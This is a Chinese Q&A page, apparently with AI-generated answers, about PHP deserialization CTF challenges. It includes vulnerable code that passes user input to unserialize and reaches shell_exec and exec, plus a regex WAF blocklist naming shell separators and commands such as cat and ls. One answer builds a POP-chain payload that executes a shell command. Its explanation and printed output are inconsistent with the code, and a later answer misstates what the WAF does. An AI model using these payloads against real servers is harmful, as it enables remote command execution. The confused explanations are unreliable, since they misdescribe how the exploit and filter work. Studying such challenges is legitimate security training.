<?php highlight_file(__FILE__); class home{ private $args; function __construct($args){ $this->args=$args; } function __wakeup() { echo file_get_contents($this->args); } } $a=$_GET['a']; unserialize($a);
时间: 2023-06-13 14:04:03 浏览: 183
这是一个 PHP 反序列化漏洞代码示例,存在代码注入风险。攻击者可以通过注入恶意代码,实现远程执行任意命令或者代码。
代码的实现逻辑是:从 GET 请求中获取参数 a,然后进行反序列化操作,反序列化的对象是 home 类。在反序列化的过程中,如果对象中存在 __wakeup 方法,则该方法会被调用。在该示例代码中,__wakeup 方法会读取文件系统中的文件并输出文件内容。攻击者可以通过控制参数 a,来注入任意文件路径,并读取该文件内容。
建议开发人员在编写代码时,尽量避免使用反序列化操作,或者对反序列化进行足够的安全措施。比如,使用安全的序列化库,禁止用户控制序列化内容等。
相关问题
请帮我构造这段代码的pop链 <?php highlight_file(__FILE__); class home{ private $args; function __construct($args){ $this->args=$args; } function __destruct() { echo shell_exec($this->args); } } $a=$_GET['a']; unserialize($a);
首先需要了解的是,构造 pop 链需要满足两个条件:
1. 对象的构造函数需要接收参数,且该参数可以被我们控制。
2. 对象的析构函数中需要存在一些恶意代码,比如执行系统命令等。
在给定的代码中,我们可以看到构造函数 `__construct` 接收参数 `$args`,并将其保存到了 `$this->args` 中。因此,我们可以通过传入恶意参数来控制 `$this->args` 的值。
此外,析构函数 `__destruct` 中存在一个 `shell_exec` 函数调用,可以用来执行系统命令。因此,我们可以将恶意代码写在 `$this->args` 中,让 `__destruct` 函数执行我们的命令。
综上,我们的目标是构造一个恶意参数,使得反序列化时会调用 `__construct` 函数,将我们的恶意参数保存到 `$this->args` 中。接着,在对象被销毁时,`__destruct` 函数会执行我们的系统命令。
下面是一个例子,其中我们将 `touch /tmp/success` 命令作为恶意代码:
```php
<?php
class home{
private $args;
function __construct($args){
$this->args=$args;
}
function __destruct(){
echo shell_exec($this->args);
}
}
// 构造 payload
$obj1 = new home("touch /tmp/success");
$payload = urlencode(serialize($obj1));
// 构造 pop 链,将 $obj1 引用传递给 $obj2
$obj2 = new home($payload);
echo urlencode(serialize($obj2)) . "\n";
```
输出结果:
```
O%3A4%3A%22home%22%3A1%3A%7Bs%3A4%3A%22args%22%3Bs%3A18%3A%22touch+%2Ftmp%2Fsuccess%22%3B%7D
```
将该 payload 传递给目标程序反序列化即可触发 pop 链,执行恶意命令。
<?php highlight_file(__FILE__); class ease{ private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; } function __destruct(){ if (in_array($this->method, array("ping"))) { call_user_func_array(array($this, $this->method), $this->args); } } function ping($ip){ exec($ip, $result); var_dump($result); } function waf($str){ if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) { return $str; } else { echo "don't hack"; } } function __wakeup(){ foreach($this->args as $k => $v) { $this->args[$k] = $this->waf($v); } } } $ctf=@$_POST['ctf']; @unserialize(base64_decode($ctf)); ?>
这是一段 PHP 代码。这段代码定义了一个名为 "ease" 的类,该类具有两个私有变量:$method 和 $args。在类的构造函数中,这两个变量会被初始化为传入的参数。类还有两个函数:ping() 和 waf()。在类的析构函数中,如果 $method 的值为 "ping",则会调用 ping() 函数,并将 $args 传递给它作为参数。ping() 函数使用 exec() 函数执行传入的参数 $ip,并使用 var_dump() 函数输出结果。waf() 函数使用 preg_match_all() 函数来匹配传入的字符串 $str 中的字符串 "or",如果匹配成功则返回 true,否则返回 false。
阅读全文